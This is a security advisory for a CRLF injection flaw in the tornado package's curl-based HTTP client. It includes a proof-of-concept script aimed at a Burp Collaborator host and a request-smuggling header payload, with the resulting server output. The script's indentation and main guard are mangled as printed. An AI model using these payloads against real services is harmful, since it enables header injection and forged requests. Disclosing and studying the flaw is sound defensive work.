Improper Neutralization of CRLF Sequences ('CRLF Injection') Affecting tornado package, versions [,6.4.1)

tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed.

Affected versions of this package are vulnerable to Improper Neutralization of CRLF Sequences ('CRLF Injection') through the CurlAsyncHTTPClient headers. An attacker can manipulate HTTP headers and construct unauthorized requests by injecting CRLF sequences into header values.

The issue can be reproduced using the following script:

import asyncio

from tornado import httpclient
from tornado import curl_httpclient
async def main():
    http_client = curl_httpclient.CurlAsyncHTTPClient()
request = httpclient.HTTPRequest(
    # Burp Collaborator payload
    "http://727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com/",
    method="POST",
    body="body",
    # Injected header using CRLF characters
    headers={"Foo": "Bar\r\nHeader: Injected"}
)

response = await http_client.fetch(request)
print(response.body)

http_client.close()

if name == "main":
    asyncio.run(main())

When the specified server receives the request, it contains the injected header (Header: Injected) on its own line:

POST / HTTP/1.1
Host: 727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com
User-Agent: Mozilla/5.0 (compatible; pycurl)
Accept: */*
Accept-Encoding: gzip,deflate
Foo: Bar
Header: Injected
Content-Length: 4
Content-Type: application/x-www-form-urlencoded

body

The attacker can also construct entirely new requests using a payload with multiple CRLF sequences. For example, specifying a header value of \r\n\r\nPOST /attacker-controlled-url HTTP/1.1\r\nHost: 727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com results in the server receiving an additional, attacker-controlled request:

POST /attacker-controlled-url HTTP/1.1
Host: 727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com
Content-Length: 4
Content-Type: application/x-www-form-urlencoded

body

• GitHub Commit